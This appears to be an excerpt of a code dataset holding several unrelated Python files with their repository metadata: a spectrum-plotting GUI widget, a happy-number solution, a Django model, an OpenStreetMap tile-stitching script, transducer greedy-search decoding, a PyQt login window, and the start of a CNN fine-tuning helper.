self.figure.canvas.get_renderer()\n x = self.zoom_bandwidth\n y = 80*2\n self.axes.set_xlim([0, x ])\n self.axes.set_ylim([0, y ])\n t = self.axes.text(100, 10, 
'10841.660V/H \\n10841.660V/H ', fontsize=8)\n bb = t.get_window_extent(r).transformed(self.axes.transData.inverted())\n self.annot_scale_factors = [(bb.x1-bb.x0)/x, (bb.y1-bb.y0)/y]\n self.annot_bbox = bb\n t.remove()\n\n def show_spectrum(self, spectrum):\n key = self.make_key(spectrum)\n s = self.spectra.get(key, None)\n if s is not None:\n self.hide_spectrum(spectrum)\n is_first = False\n else:\n is_first = len(self.spectra)==0\n self.get_limits.cache_clear()\n s = Spectrum(self, spectrum, color=self.cycle_colors[len(self.spectra)])\n self.spectra[key] = s\n self.add_legend_button(s, s.color)\n if not s.show():\n return\n if self.legend is not None:\n self.legend.remove()\n #self.pan_spectrum(0)\n self.pan_band(s.spec[0,0])\n xlimits, ylimits = self.get_limits()\n offset = 0 if self.pan_start_freq is None else self.pan_start_freq - xlimits[0]\n\n self.scrollbar.SetScrollbar(offset, self.zoom_bandwidth, xlimits[1] - xlimits[0], 200)\n self.canvas.draw()\n wx.CallAfter(self.parent.Refresh)\n\n def pan_spectrum(self, offset):\n xlimits, _ = self.get_limits()\n xmin = xlimits[0]+offset\n xmax = xmin +self.zoom_bandwidth\n self.pan_start_freq = xmin\n self.axes.set_xbound((xmin, xmax))\n self.canvas.draw()\n self.parent.Refresh()\n\n def pan_band(self, start):\n xmin, ymin = start, -50\n xmax, ymax = start + self.zoom_bandwidth, -45\n self.axes.set_xbound((xmin, xmax))\n self.canvas.draw()\n self.parent.Refresh()\n\n def hide_spectrum(self, spectrum):\n key = self.make_key(spectrum)\n s = self.spectra.get(key, None)\n if s is None:\n return\n s.legend_panel.Destroy()\n self.toolbar_sizer.Layout()\n s.clear()\n del self.spectra[key]\n if self.legend is not None:\n self.legend.remove()\n\n @lru_cache(maxsize=None)\n def get_limits(self):\n if self.spectra is None or len(self.spectra)==0:\n return ((self.parent.start_freq/1000, self.parent.end_freq/1000), (-60.0, -40.0))\n xlimits, ylimits = None, None\n for spectrum in self.spectra.values():\n xlimits = combine_ranges(xlimits, spectrum.xlimits)\n ylimits = combine_ranges(ylimits, spectrum.ylimits)\n #-100 and +100 to allow offscreen annotations to be seen\n return (xlimits[0] - 100 , xlimits[1] +100), ylimits\n\n def update_matplotlib_legend(self, spectrum):\n self.legend = self.figure.legend(ncol=len(self.spectra))\n\n for legline, key in zip(self.legend.get_lines(), self.spectra):\n legline.set_picker(True) # Enable picking on the legend line.\n legline.key = key\n\n def on_pickSHOWHIDE(self, event):\n \"\"\"\n show/hide graph by clicking on legend line\n \"\"\"\n # On the pick event, find the original line corresponding to the legend\n # proxy line, and toggle its visibility.\n legline = event.artist\n key = legline.key\n dtdebug(f\"toggling {key} for {legline}\")\n origline = self.spectra[key].spectrum_graph[0]\n visible = not origline.get_visible()\n origline.set_visible(visible)\n # Change the alpha on the line in the legend so we can see what lines\n # have been toggled.\n legline.set_alpha(1.0 if visible else 0.2)\n self.figure.canvas.draw()\n\n def set_current_annot(self, annot):\n if annot == self.current_annot:\n return\n if self.current_annot is not None:\n if self.current_annot.tp.scan_ok:\n color = 'green'\n elif self.current_annot.tp.scan_failed:\n color = 'red'\n else:\n color ='black'\n self.current_annot.set_color(color)\n color = 'blue'\n annot.set_color(color)\n if self.current_annot_vline is not None:\n self.current_annot_vline.remove()\n self.current_annot_vline = self.axes.axvline(x=annot.tp.freq, color='blue')\n 
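# Editor's note (added comment): axvline draws a full-height vertical marker at the\n        # selected transponder's frequency; the handle is kept in current_annot_vline so\n        # the marker can be removed again when the selection moves to another annotation.\n        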
self.current_annot = annot\n self.canvas.draw()\n\n def set_annot_status_(self, annot, peak, mux, locked):\n if annot is None:\n assert False\n return\n freq, symbol_rate = mux.frequency/1000, int(mux.symbol_rate/1000),\n annot.set_text(f\"{freq:8.3f}{enum_to_str(mux.pol)} \\n{symbol_rate}kS/s \")\n annot.tp.scan_ok = locked\n annot.tp.scan_failed = not locked\n color = 'green' if locked else 'red'\n annot.set_color(color)\n self.canvas.draw()\n\n def set_annot_status(self, spectrum_key, peak, mux, locked):\n key = str(spectrum_key)\n spectrum = self.spectra[key]\n annot = spectrum.annot_for_peak(peak)\n if annot is None:\n assert False\n return\n self.set_annot_status_(annot, peak, mux, locked)\n\n def set_current_annot_status(self, mux, si_or_driver_mux, locked):\n if self.current_annot is None:\n return\n annot = self.current_annot\n if abs(annot.tp.freq*1000 - si_or_driver_mux.frequency) >= 0.2 * annot.tp.symbol_rate \\\n or enum_to_str(si_or_driver_mux.pol) != annot.tp.spectrum.pol:\n return\n self.set_annot_status_(self.current_annot, mux, si_or_driver_mux, locked)\n\n def reset_current_annot_status(self, mux):\n if self.current_annot is None:\n return\n spectrum = self.current_annot.tp.spectrum\n if spectrum.annot_for_peak(mux) != self.current_annot:\n return\n self.current_annot.tp.scan_ok = False\n self.current_annot.tp.scan_failed = False\n color = 'blue'\n self.current_annot.set_color(color)\n self.canvas.draw()\n\n def set_current_tp(self, tp):\n \"\"\"\n Highlight current tp\n \"\"\"\n # On the pick event, find the original line corresponding to the legend\n # proxy line, and toggle its visibility.\n for annot in tp.spectrum.annots:\n if annot.tp == tp:\n dtdebug(f'set current_tp: spec={tp.spectrum} tp={annot.tp}')\n self.set_current_annot(annot)\n return\n def on_button_press(self, event):\n pass\n\n def on_pick(self, event):\n \"\"\"\n show/hide graph by clicking on legend line\n \"\"\"\n # On the pick event, find the original line corresponding to the legend\n # proxy line, and toggle its visibility.\n what = event.artist\n for key,spectrum in self.spectra.items():\n if what in spectrum.annots:\n dtdebug(f'Spectrum: pick annot {spectrum} tp={what.tp}')\n #import pdb; pdb.set_trace()\n self.set_current_annot(what)\n wx.CallAfter(self.parent.OnSelectMux, what.tp)\n return\n me = event.mouseevent\n freq = me.xdata\n best_delta = 20000000\n best_annot = None\n dtdebug(f\"Spectrum: pick freq={freq}\")\n for key,spectrum in self.spectra.items():\n if what == spectrum.hlines or what == spectrum.vlines:\n ind = event.ind[0]\n verts = what.get_paths()[ind].vertices\n f = (verts[1, 0] + verts[0, 0])/2\n annot, delta = spectrum.annot_for_freq(freq)\n if delta < best_delta:\n best_delta = delta\n best_annot = annot\n\n if best_annot is not None:\n dtdebug(f'Spectrum: pick line spectrum={spectrum} tp={best_annot.tp}')\n self.set_current_annot(best_annot)\n wx.CallAfter(self.parent.OnSelectMux, best_annot.tp)\n return\n\n def OnCloseGraph(self, evt):\n spectrum = evt.GetEventObject().spectrum.spectrum\n self.hide_spectrum(spectrum)\n self.canvas.draw()\n self.parent.Refresh()\n\n def OnToggleAnnots(self, evt):\n spectrum = evt.GetEventObject().spectrum\n if False:\n if spectrum.spectrum_graph is not None:\n origline = spectrum.spectrum_graph[0]\n visible = not origline.get_visible()\n origline.set_visible(visible)\n\n if spectrum.hlines is not None:\n visible = not spectrum.hlines.get_visible()\n spectrum.hlines.set_visible(visible)\n\n if spectrum.vlines is not None:\n visible = not 
spectrum.vlines.get_visible()\n spectrum.vlines.set_visible(visible)\n\n for a in spectrum.annots:\n visible = not a.get_visible()\n a.set_visible(visible)\n\n\n self.figure.canvas.draw()\n self.parent.Refresh()\n\n def OnToggleDetrend(self, evt):\n self.do_detrend = evt.GetEventObject().GetValue()\n spectra = []\n for key,spectrum in self.spectra.items():\n spectra.append(spectrum.spectrum)\n for spectrum in spectra:\n self.hide_spectrum(spectrum)\n for spectrum in spectra:\n self.show_spectrum(spectrum)\n self.figure.canvas.draw()\n self.parent.Refresh()\n\n\n\"\"\"\nsolution to layout text boxes (freq,pol,symrate) such that they do not overlap with the vertical lines\npointing to spectral peaks, the horizontal lines describing bandwidth, and the curve itself\n-boxes are either left aligned and then start at the vertical line, or right aligned and then end\n at the vertical line\n\n-step 1 is to compute a baseline version which is above the curve and horizontal lines, has only left aligned text\n but can have overlap between boxes\n\n-step 2 is to compute two overlap-free versions:\n--2.a \"increasing\" version in which all boxes are right aligned and overlapping\n boxes are moved above their left neighbor. This requires a single pass over the data\n--2.b \"decreasing\" version in which all boxes are left aligned and overlapping\n boxes are moved above their right neighbor. This requires a single pass over the data (but starting from the end)\n\n-step 3 is to merge the increasing and decreasing versions as follows:\n--start at the left with the version having the lowest height; call this \"current\" version\n--skip to the next (right) element. When the alternate version would be lower than the current version, attempt to\n switch version as follows (if switching is not possible, simply keep the current version)\n -switching from increasing to decreasing is always allowed as it creates no additional conflict (if the\n left element was increasing, it was right aligned and cannot cause overlap with the right element, which is\n left aligned in this case)\n -switching from decreasing to increasing is allowed only if the current element will not overlap with the increasing\n (=left aligned) version of its right neighbor. 
This means that switching will only be allowed between separated clusters\n of overlapping elements.\n\n\n\n\"\"\"\n","repo_name":"deeptho/neumodvb","sub_path":"gui/neumodvb/neumoplot.py","file_name":"neumoplot.py","file_ext":"py","file_size_in_byte":33857,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"70314932214","text":"# Happy Number\nclass Solution:\n def calcHappy(self, num) -> int:\n sam = rem = 0\n while(num > 0):\n rem = num % 10 # last digit\n sam = sam + (rem*rem)\n num = num//10 # integer division drops the last digit\n return sam\n\n def isHappy(self, n: int) -> bool:\n nam = 0\n nam = self.calcHappy(n)\n # every unhappy number eventually enters the cycle that contains 4,\n # so reaching 4 proves n is not happy\n while (nam != 1 and nam != 4):\n nam = self.calcHappy(nam)\n if nam == 1:\n return True\n elif nam == 4:\n return False\n # print(self.calcHappy(n))\n","repo_name":"Azjargal13/lc-notes-codes","sub_path":"30days-challenge/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2373707591","text":"from django.db import models\nfrom django.core.validators import MaxValueValidator\n\nfrom common.models import BaseModel\n\n\nclass Subdivision(BaseModel):\n code = models.CharField(max_length=4, verbose_name=\"Code\")\n name = models.CharField(\n verbose_name=\"Subdivision name\",\n max_length=35,\n null=True,\n blank=True,\n )\n phone = models.CharField(\n verbose_name=\"Phone\",\n max_length=10,\n null=True,\n blank=True,\n )\n chief = models.CharField(\n verbose_name=\"Subdivision chief\",\n max_length=35,\n null=True,\n blank=True,\n )\n percent_city = models.IntegerField(\n verbose_name=\"City percentage\",\n validators=[MaxValueValidator(99)],\n null=True,\n blank=True,\n )\n parent = models.ForeignKey(\n \"self\",\n null=True,\n blank=True,\n on_delete=models.CASCADE\n )\n\n def __str__(self) -> str:\n return str(self.name)\n\n class Meta:\n verbose_name = \"Vehicle-owning subdivision\"\n verbose_name_plural = \"Vehicle-owning subdivisions\"\n","repo_name":"redbird504/fms_backend","sub_path":"src/vehicles/models/subdivision.py","file_name":"subdivision.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35084112880","text":"import io\nimport math\nimport random\n\nimport mercantile\nimport requests\nfrom bs4 import BeautifulSoup as Bs\nfrom cairo import ImageSurface, FORMAT_ARGB32, Context\n\n\ndef get_map(west, south, east, north, zoom):\n tiles = list(mercantile.tiles(west, south, east, north, zoom))\n\n min_x = min([t.x for t in tiles])\n min_y = min([t.y for t in tiles])\n max_x = max([t.x for t in tiles])\n max_y = max([t.y for t in tiles])\n\n tile_size = (256, 256)\n\n map_image = ImageSurface(FORMAT_ARGB32, tile_size[0] * (max_x - min_x + 1), tile_size[1] * (max_y - min_y + 1))\n ctx = Context(map_image)\n\n for t in tiles:\n server = random.choice(['a', 'b', 'c'])\n url = 'http://{server}.tile.openstreetmap.org/{zoom}/{x}/{y}.png'.format(server=server, zoom=t.z, x=t.x, y=t.y)\n response = requests.get(url)\n img = ImageSurface.create_from_png(io.BytesIO(response.content))\n\n # pixel offsets: tile width for x, tile height for y\n ctx.set_source_surface(img, (t.x - min_x) * tile_size[0], (t.y - min_y) * tile_size[1])\n ctx.paint()\n\n bounds = {\n \"left\": min([mercantile.xy_bounds(t).left for t in tiles]),\n \"right\": max([mercantile.xy_bounds(t).right for t in tiles]),\n \"bottom\": min([mercantile.xy_bounds(t).bottom for t in 
tiles]),\n \"top\": max([mercantile.xy_bounds(t).top for t in tiles]),\n }\n\n kx = map_image.get_width() / (bounds['right'] - bounds['left'])\n ky = map_image.get_height() / (bounds['top'] - bounds['bottom'])\n\n left_top = mercantile.xy(west, north)\n right_bottom = mercantile.xy(east, south)\n offset_left = (left_top[0] - bounds['left']) * kx\n offset_top = (bounds['top'] - left_top[1]) * ky\n offset_right = (bounds['right'] - right_bottom[0]) * kx\n offset_bottom = (right_bottom[1] - bounds['bottom']) * ky\n\n map_image_clipped = ImageSurface(FORMAT_ARGB32, map_image.get_width() - int(offset_left + offset_right),\n map_image.get_height() - int(offset_top + offset_bottom))\n\n ctx = Context(map_image_clipped)\n ctx.set_source_surface(map_image, -offset_left, -offset_top)\n ctx.paint()\n return map_image_clipped\n\n\ndef transform_coords(map_img: ImageSurface, coords, lon, lat):\n west, south, north, east = coords\n\n left_top = mercantile.xy(west, north)\n right_bottom = mercantile.xy(east, south)\n\n kx = map_img.get_width() / (right_bottom[0] - left_top[0])\n ky = map_img.get_height() / (right_bottom[1] - left_top[1])\n\n x, y = mercantile.xy(lon, lat)\n\n x = (x - left_top[0]) * kx\n y = (y - left_top[1]) * ky\n return x, y\n\n\ndef draw(bbox, nodes, output_filename=\"data/map.png\"):\n south, west, north, east = bbox\n zoom = 15\n\n map_image = get_map(west, south, east, north, zoom)\n\n ctx = Context(map_image)\n for node_x, node_y in nodes:\n node_x, node_y = float(node_x), float(node_y)\n x, y = transform_coords(map_image, [west, south, north, east], node_x, node_y)\n ctx.set_source_rgb(255, 0, 0)\n ctx.arc(x, y, 3, 0, 2 * math.pi)\n ctx.stroke()\n\n with open(output_filename, \"wb\") as f:\n map_image.write_to_png(f)\n","repo_name":"Krayushkin68/GEO_analyze","sub_path":"pygeoanalyze/draw_map.py","file_name":"draw_map.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29039491982","text":"import math\nfrom typing import List\nimport torch\n\nfrom aural.modeling.post.beamsearch import greedy_search\nfrom torch.nn.utils.rnn import pad_sequence\nfrom alfred import device\n\n\ndef greedy_search_single_batch(\n model, encoder_out: torch.Tensor, max_sym_per_frame: int=1\n) -> List[int]:\n \"\"\"Greedy search for a single utterance.\n Args:\n model:\n An instance of `Transducer`.\n encoder_out:\n A tensor of shape (N, T, C) from the encoder. Support only N==1 for now.\n max_sym_per_frame:\n Maximum number of symbols per frame. 
If it is set to 0, the WER\n would be 100%.\n Returns:\n Return the decoded result.\n \"\"\"\n assert encoder_out.ndim == 3\n # support only batch_size == 1 for now\n assert encoder_out.size(0) == 1, encoder_out.size(0)\n\n blank_id = model.decoder.blank_id\n context_size = model.decoder.context_size\n unk_id = getattr(model, \"unk_id\", blank_id)\n\n device = next(model.parameters()).device\n decoder_input = torch.tensor(\n [blank_id] * context_size, device=device, dtype=torch.int64\n ).reshape(1, context_size)\n\n decoder_out = model.decoder(decoder_input, need_pad=False)\n decoder_out = model.joiner.decoder_proj(decoder_out)\n encoder_out = model.joiner.encoder_proj(encoder_out)\n\n T = encoder_out.size(1)\n t = 0\n hyp = [blank_id] * context_size\n\n # Maximum symbols per utterance.\n max_sym_per_utt = 1000\n # symbols per frame\n sym_per_frame = 0\n # symbols per utterance decoded so far\n sym_per_utt = 0\n\n while t < T and sym_per_utt < max_sym_per_utt:\n if sym_per_frame >= max_sym_per_frame:\n sym_per_frame = 0\n t += 1\n continue\n # fmt: off\n current_encoder_out = encoder_out[:, t:t+1, :].unsqueeze(2)\n logits = model.joiner(\n current_encoder_out, decoder_out.unsqueeze(1), project_input=False\n )\n # logits is (1, 1, 1, vocab_size)\n y = logits.argmax().item()\n if y not in (blank_id, unk_id):\n hyp.append(y)\n decoder_input = torch.tensor([hyp[-context_size:]], device=device).reshape(\n 1, context_size\n )\n decoder_out = model.decoder(decoder_input, need_pad=False)\n decoder_out = model.joiner.decoder_proj(decoder_out)\n\n sym_per_utt += 1\n sym_per_frame += 1\n else:\n sym_per_frame = 0\n t += 1\n hyp = hyp[context_size:] # remove blanks\n return hyp\n\n\ndef greedy_search_batch(\n model,\n encoder_out: torch.Tensor,\n encoder_out_lens: torch.Tensor,\n) -> List[List[int]]:\n assert encoder_out.ndim == 3\n assert encoder_out.size(0) >= 1, encoder_out.size(0)\n\n packed_encoder_out = torch.nn.utils.rnn.pack_padded_sequence(\n input=encoder_out,\n lengths=encoder_out_lens.cpu(),\n batch_first=True,\n enforce_sorted=False,\n )\n device = next(model.parameters()).device\n blank_id = model.decoder.blank_id\n unk_id = getattr(model, \"unk_id\", blank_id)\n context_size = model.decoder.context_size\n\n batch_size_list = packed_encoder_out.batch_sizes.tolist()\n N = encoder_out.size(0)\n assert torch.all(encoder_out_lens > 0), encoder_out_lens\n assert N == batch_size_list[0], (N, batch_size_list)\n\n hyps = [[blank_id] * context_size for _ in range(N)]\n\n decoder_input = torch.tensor(\n hyps,\n device=device,\n dtype=torch.int64,\n ) # (N, context_size)\n\n decoder_out = model.decoder(decoder_input, need_pad=False)\n decoder_out = model.joiner.decoder_proj(decoder_out)\n encoder_out = model.joiner.encoder_proj(packed_encoder_out.data)\n\n offset = 0\n for batch_size in batch_size_list:\n start = offset\n end = offset + batch_size\n current_encoder_out = encoder_out.data[start:end]\n current_encoder_out = current_encoder_out.unsqueeze(1).unsqueeze(1)\n # current_encoder_out's shape: (batch_size, 1, 1, encoder_out_dim)\n offset = end\n decoder_out = decoder_out[:batch_size]\n\n logits = model.joiner(\n current_encoder_out, decoder_out.unsqueeze(1), project_input=False\n )\n # logits'shape (batch_size, 1, 1, vocab_size)\n logits = logits.squeeze(1).squeeze(1) # (batch_size, vocab_size)\n assert logits.ndim == 2, logits.shape\n y = logits.argmax(dim=1).tolist()\n emitted = False\n for i, v in enumerate(y):\n if v not in (blank_id, unk_id):\n hyps[i].append(v)\n emitted = True\n if 
emitted:\n # update decoder output\n decoder_input = [h[-context_size:] for h in hyps[:batch_size]]\n decoder_input = torch.tensor(\n decoder_input,\n device=device,\n dtype=torch.int64,\n )\n decoder_out = model.decoder(decoder_input, need_pad=False)\n decoder_out = model.joiner.decoder_proj(decoder_out)\n\n sorted_ans = [h[context_size:] for h in hyps]\n ans = []\n unsorted_indices = packed_encoder_out.unsorted_indices.tolist()\n for i in range(N):\n ans.append(sorted_ans[unsorted_indices[i]])\n return ans\n\nLOG_EPS = math.log(1e-10)\n\n\nclass GreedySearchOffline:\n def __init__(self):\n pass\n\n @torch.no_grad()\n def process(\n self,\n model,\n features: List[torch.Tensor],\n ) -> List[List[int]]:\n \"\"\"\n Args:\n model:\n The RNN-T transducer model.\n features:\n A list of 2-D tensors. Each entry is of shape\n (num_frames, feature_dim).\n Returns:\n Return a list-of-list containing the decoding token IDs.\n \"\"\"\n features_length = torch.tensor(\n [f.size(0) for f in features],\n dtype=torch.int64,\n )\n features = pad_sequence(\n features,\n batch_first=True,\n padding_value=LOG_EPS,\n )\n\n features = features.to(device)\n features_length = features_length.to(device)\n\n if device.type == \"cpu\":\n encoder_out, encoder_out_length = model.encoder(\n features,\n features_length,\n )\n elif device.type == \"cuda\":\n with torch.cuda.amp.autocast():\n encoder_out, encoder_out_length = model.encoder(\n features,\n features_length,\n )\n else:\n raise NotImplementedError(\"Device not supported\")\n\n hyp_tokens = greedy_search_batch(\n model=model,\n encoder_out=encoder_out,\n encoder_out_lens=encoder_out_length.cpu(),\n )\n return hyp_tokens","repo_name":"lucasjinreal/aural","sub_path":"aural/modeling/post/geedysearch.py","file_name":"geedysearch.py","file_ext":"py","file_size_in_byte":6757,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"21"} +{"seq_id":"35973854682","text":"from PyQt5.Qt import *\nimport sys\nfrom database import user_con\nfrom MainWindow import MainWindow\nfrom userRecordDatabase import user_record_con\n\nuserCon = user_con(\"data.db\")\nuserRecordCon = user_record_con(\"userCon.db\")\n\n\n# Login window\nclass LoginWindow(QWidget):\n def __init__(self):\n super(LoginWindow, self).__init__()\n self.resize(300, 100)\n self.setWindowTitle(\"Log in\")\n\n # Instantiate the labels, input fields and buttons\n self.userLabel = QLabel(\"Username:\", self)\n self.pwdLabel = QLabel(\"Password:\", self)\n self.userLine = QLineEdit(self)\n self.pwdLine = QLineEdit(self)\n self.loginButton = QPushButton(\"Log in\", self)\n self.signinButton = QPushButton(\"Register\", self)\n\n # Instantiate the layout frames\n self.userAndPwdLayout = QGridLayout() # layout for the username/password area\n self.buttonLayout = QHBoxLayout() # layout for the login/register buttons\n self.allLayout = QVBoxLayout() # overall vertical layout\n\n self.lineedit_init()\n self.pushbutton_init()\n self.layout_init() # initialize the login form layout\n self.signin_page = SigninPage() # instantiate the registration page\n\n # Initialize the username and password fields of the login window\n def lineedit_init(self):\n self.userLine.setPlaceholderText(\"Please enter your username\")\n self.pwdLine.setPlaceholderText(\"Please enter your password\")\n self.pwdLine.setEchoMode(QLineEdit.Password)\n self.userLine.textChanged.connect(self.check_input_func)\n self.pwdLine.textChanged.connect(self.check_input_func)\n\n # Connect the login button signals to their slot functions\n def pushbutton_init(self):\n self.loginButton.setEnabled(False)\n self.loginButton.clicked.connect(self.check_login_func)\n self.signinButton.clicked.connect(self.show_signin_page_func)\n\n # Populate the layouts\n def layout_init(self):\n self.userAndPwdLayout.addWidget(self.userLabel, 0, 0, 1, 1)\n 
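# Editor's note (added comment): QGridLayout.addWidget(widget, row, column,\n        # rowSpan, columnSpan) -- the labels occupy column 0 and the line edits\n        # column 1, each spanning a single cell.\n        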
self.userAndPwdLayout.addWidget(self.userLine, 0, 1, 1, 1)\n        self.userAndPwdLayout.addWidget(self.pwdLabel, 1, 0, 1, 1)\n        self.userAndPwdLayout.addWidget(self.pwdLine, 1, 1, 1, 1)\n        self.buttonLayout.addWidget(self.loginButton)\n        self.buttonLayout.addWidget(self.signinButton)\n        self.allLayout.addLayout(self.userAndPwdLayout)\n        self.allLayout.addLayout(self.buttonLayout)\n\n        self.setLayout(self.allLayout)\n\n    # Check whether the username and password boxes are empty; the login button\n    # stays disabled while either of them is empty\n    def check_input_func(self):\n        if self.userLine.text() and self.pwdLine.text():\n            self.loginButton.setEnabled(True)\n        else:\n            self.loginButton.setEnabled(False)\n\n    # Log in: verify that the username and password match\n    def check_login_func(self):\n        if userCon.login(self.userLine.text(), self.pwdLine.text()):\n            QMessageBox.information(self, \"Information\", \"登陆成功!\")\n            self.close()\n            self.mainWindow = MainWindow(self.userLine.text())\n            self.mainWindow.show()\n        else:\n            QMessageBox.critical(self, \"Wrong\", \"用户名或密码错误\")\n            self.pwdLine.clear()\n\n    # Bring up the registration dialog\n    def show_signin_page_func(self):\n        self.signin_page.exec_()\n\n\n# Registration window\nclass SigninPage(QDialog):\n    def __init__(self):\n        super(SigninPage, self).__init__()\n        self.setWindowTitle(\"注册\")\n\n        self.signinUserLabel = QLabel(\"新的用户名:\", self)\n        self.signinPwdLabel = QLabel(\"密码:\", self)\n        self.signinPwd2Label = QLabel(\"重复密码:\", self)\n        self.signinUserLine = QLineEdit(self)\n        self.signinPwdLine = QLineEdit(self)\n        self.signinPwd2Line = QLineEdit(self)\n        self.signinButton = QPushButton(\"注册\", self)\n\n        self.userHLayout = QHBoxLayout()\n        self.pwdHLayout = QHBoxLayout()\n        self.pwd2HLayout = QHBoxLayout()\n        self.allVLayout = QVBoxLayout()\n\n        self.lineedit_init()\n        self.pushbutton_init()\n        self.layout_init()\n\n    # Initialize the registration inputs and connect them to the input checker\n    def lineedit_init(self):\n        self.signinPwdLine.setEchoMode(QLineEdit.Password)\n        self.signinPwd2Line.setEchoMode(QLineEdit.Password)\n        self.signinPwdLine.setPlaceholderText(\"长度不少于6位,不多于32位\")\n        self.signinPwd2Line.setPlaceholderText(\"请重复输入上述密码\")\n\n        self.signinUserLine.textChanged.connect(self.check_input_func)\n        self.signinPwdLine.textChanged.connect(self.check_input_func)\n        self.signinPwd2Line.textChanged.connect(self.check_input_func)\n\n    # Initialize the register button and connect it to the registration logic\n    def pushbutton_init(self):\n        self.signinButton.setEnabled(False)\n        self.signinButton.clicked.connect(self.signin_func)\n\n    # Populate the page layouts\n    def layout_init(self):\n        self.userHLayout.addWidget(self.signinUserLabel)\n        self.userHLayout.addWidget(self.signinUserLine)\n        self.pwdHLayout.addWidget(self.signinPwdLabel)\n        self.pwdHLayout.addWidget(self.signinPwdLine)\n        self.pwd2HLayout.addWidget(self.signinPwd2Label)\n        self.pwd2HLayout.addWidget(self.signinPwd2Line)\n\n        self.allVLayout.addLayout(self.userHLayout)\n        self.allVLayout.addLayout(self.pwdHLayout)\n        self.allVLayout.addLayout(self.pwd2HLayout)\n        self.allVLayout.addWidget(self.signinButton)\n\n        self.setLayout(self.allVLayout)\n\n    # Check that all three input boxes contain text\n    def check_input_func(self):\n        if (\n            self.signinUserLine.text()\n            and self.signinPwdLine.text()\n            and self.signinPwd2Line.text()\n        ):\n            self.signinButton.setEnabled(True)\n        else:\n            self.signinButton.setEnabled(False)\n\n    # Perform registration: check that the two entered passwords are identical\n    def signin_func(self):\n        if self.signinPwdLine.text() != self.signinPwd2Line.text():\n            QMessageBox.critical(self, \"错误\", \"两次输入的密码不一致!\")\n        else:\n            res = userCon.register(self.signinUserLine.text(), self.signinPwdLine.text())\n            if res == 0:\n                userRecordCon.createUserTable(self.signinUserLine.text())\n                userRecordCon.createUserStar(self.signinUserLine.text())\n                
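# judging from the branches below, user_con.register() returns 0 on success,\n                # 1 when the password length is invalid, and any other value when the\n                # username is already taken\n                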
QMessageBox.information(self, \"提示\", \"注册成功,请重新登陆\")\n self.close()\n self.signinUserLine.clear()\n self.signinPwdLine.clear()\n self.signinPwd2Line.clear()\n elif res == 1:\n QMessageBox.critical(self, \"错误\", \"密码长度不符合要求!\")\n self.signinUserLine.clear()\n self.signinPwdLine.clear()\n self.signinPwd2Line.clear()\n else:\n QMessageBox.critical(self, \"错误\", \"用户名已存在\")\n self.signinUserLine.clear()\n self.signinPwdLine.clear()\n self.signinPwd2Line.clear()\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n loginWindow = LoginWindow()\n loginWindow.show()\n sys.exit(app.exec_())\n","repo_name":"renyufly/what_to_eat2023","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":7352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26445473781","text":"# -*- coding: utf-8 -*-\r\nimport torch\r\nfrom torch import nn\r\nfrom torch import optim\r\nfrom torch.autograd import Variable\r\nimport torchvision.models as models\r\n\r\nimport model\r\n\r\nimport time\r\nimport os\r\nimport math\r\nimport sys\r\n\r\nfrom tqdm import tqdm\r\n\r\nfrom utils import logger_setting\r\n# from model_baf_vgg19 import vgg19 as vgg19_baf\r\nfrom model_vgg import vgg19 as vgg19_baf\r\n\r\nclass GradReverse(torch.autograd.Function):\r\n @staticmethod\r\n def forward(ctx, x):\r\n return x.view_as(x)\r\n\r\n @staticmethod\r\n def backward(ctx, grad_output):\r\n return grad_output.neg() * 0.1\r\n\r\ndef grad_reverse(x):\r\n return GradReverse.apply(x)\r\n\r\nclass AdaptiveConcatPool2d(torch.nn.Module):\r\n \"Layer that concats `AdaptiveAvgPool2d` and `AdaptiveMaxPool2d`.\"\r\n def __init__(self, sz=None):\r\n \"Output will be 2*sz or 2 if sz is None\"\r\n super(AdaptiveConcatPool2d, self).__init__()\r\n self.output_size = sz or 1\r\n self.ap = torch.nn.AdaptiveAvgPool2d(self.output_size)\r\n self.mp = torch.nn.AdaptiveMaxPool2d(self.output_size)\r\n\r\n def forward(self, x): return torch.cat([self.mp(x), self.ap(x)], 1)\r\n\r\nclass FinetuneModel():\r\n def __init__(self) -> None:\r\n self.bn_types = (nn.BatchNorm1d, nn.BatchNorm2d, nn.BatchNorm3d)\r\n \r\n def freeze_all(self, model_params):\r\n for param in model_params:\r\n param.requires_grad = False\r\n\r\n def create_head(self, nf, nc, bn_final=False, single_head=False):\r\n \"Model head that takes in 'nf' features and outputs 'nc' classes\"\r\n pool = AdaptiveConcatPool2d()\r\n layers = [pool, torch.nn.Flatten()]\r\n if single_head:\r\n layers += self.head_blocks(nf, 0.5, nc)\r\n else:\r\n layers += self.head_blocks(nf, 0.25, 512, torch.nn.ReLU(inplace=True))\r\n layers += self.head_blocks(512, 0.5, nc)\r\n \r\n if bn_final:\r\n layers.append(nn.BatchNorm1d(nc, momentum=0.01))\r\n \r\n return nn.Sequential(*layers)\r\n\r\n def head_blocks(self, in_dim, p, out_dim, activation=None):\r\n \"Basic Linear block\"\r\n layers = [\r\n nn.BatchNorm1d(in_dim),\r\n nn.Dropout(p),\r\n nn.Linear(in_dim, out_dim)\r\n ]\r\n \r\n if activation is not None:\r\n layers.append(activation)\r\n \r\n return layers \r\n\r\n def requires_grad(self, layer):\r\n \"Determines whether 'layer' requires gradients\"\r\n ps = list(layer.parameters())\r\n if not ps: return None\r\n return ps[0].requires_grad\r\n\r\n def cnn_model(self, model, nc, hidden, single_head=False, bn_final=False, init=torch.nn.init.kaiming_normal_):\r\n \"Creates a model using a pretrained 'model' and appends a new head to it with 'nc' outputs\"\r\n \r\n # remove dense and freeze everything\r\n if single_head:\r\n 
